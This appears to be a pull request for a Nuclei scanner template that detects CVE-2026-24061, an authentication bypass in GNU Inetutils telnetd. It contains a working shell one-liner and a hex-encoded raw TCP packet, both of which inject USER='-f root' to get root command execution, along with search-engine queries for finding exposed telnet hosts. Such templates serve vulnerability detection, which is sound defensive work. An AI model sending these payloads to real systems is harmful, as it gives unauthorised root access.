### PR TITLE
CVE-2026-24061: add TCP raw-protocol approach to inetutils telnetd template

### DIFF
--- a/network/cves/2026/CVE-2026-24061.yaml
+++ b/network/cves/2026/CVE-2026-24061.yaml
@@ -1,0 +1,72 @@
+id: CVE-2026-24061
+
+info:
+  name: GNU Inetutils telnetd - Authentication Bypass
+  author: pussycat0x
+  severity: critical
+  description: |
+    GNU Inetutils telnetd through 2.7 contains an authentication bypass caused by setting the USER environment variable to \"-f root\", letting remote attackers bypass authentication, exploit requires remote access to telnetd service.
+  remediation: |
+    Update to a version later than 2.7 or the latest available version.
+  impact: |
+    Remote attackers can bypass authentication, gaining unauthorized root access to the system.
+  reference:
+    - https://github.com/vulhub/vulhub/tree/master/inetutils/CVE-2026-24061
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-24061
+    cwe-id: CWE-88
+    epss-score: 0.97878
+    epss-percentile: 0.99902
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: gnu
+    product: inetutils
+    shodan-query: port:23 telnet
+    fofa-query: port="23" && protocol="telnet"
+  tags: cve,cve2026,telnet,auth-bypass,rce,code,tcp,kev,vkev
+
+code:
+  - engine:
+      - sh
+      - bash
+
+    source: |
+      (sleep 2; echo "id"; sleep 2) | USER="-f root" telnet -a $Host $Port
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: response
+        regex:
+          - 'uid=[0-9]+\([a-zA-Z0-9_-]+\)\s*gid=[0-9]+\([a-zA-Z0-9_-]+\)'
+
+      - type: word
+        part: response
+        words:
+          - "Last login"
+          - "Debian"
+        condition: and
+
+tcp:
+  - inputs:
+      # Tek paket: telnet negotiation (IAC DO ECHO + IAC DO SGA) +
+      # NEW-ENVIRON (RFC 1572): IAC SB NEW-ENVIRON IS VAR USER VALUE "-f root" IAC SE +
+      # probe "id\n"
+      # fffd01fffd03 | fffa39000055534552012d6620726f6f74fff0 | 69640a
+      - data: "fffd01fffd03fffa39000055534552012d6620726f6f74fff069640a"
+        type: hex
+        read: 2048
+
+    host:
+      - "{{Hostname}}"
+    port: 23
+
+    matchers:
+      - type: word
+        words:
+          - "uid=0"
+          - "root@"
+          - "# "


### PR DESCRIPTION
### CVE-2026-24061 — GNU Inetutils telnetd auth bypass (USER=-f root)

As suggested in https://github.com/projectdiscovery/nuclei-templates/pull/16809 review, this adds a **TCP raw-protocol approach** to the existing code-based template:

- **Existing:** `code:` engine — requires a local `telnet` client on the scanner host
- **Added:** `tcp:` engine — sends the full exploit in one hex packet:
  - telnet negotiation (IAC DO ECHO + IAC DO SGA)
  - NEW-ENVIRON (RFC 1572): `IAC SB NEW-ENVIRON IS VAR USER VALUE \"-f root\" IAC SE`
  - probe command `id\n`
  - Matches `uid=0`, `root@`, or `# ` in the response

Works on scanners without a telnet client and in fully containerized environments.

Validated with `nuclei -validate`.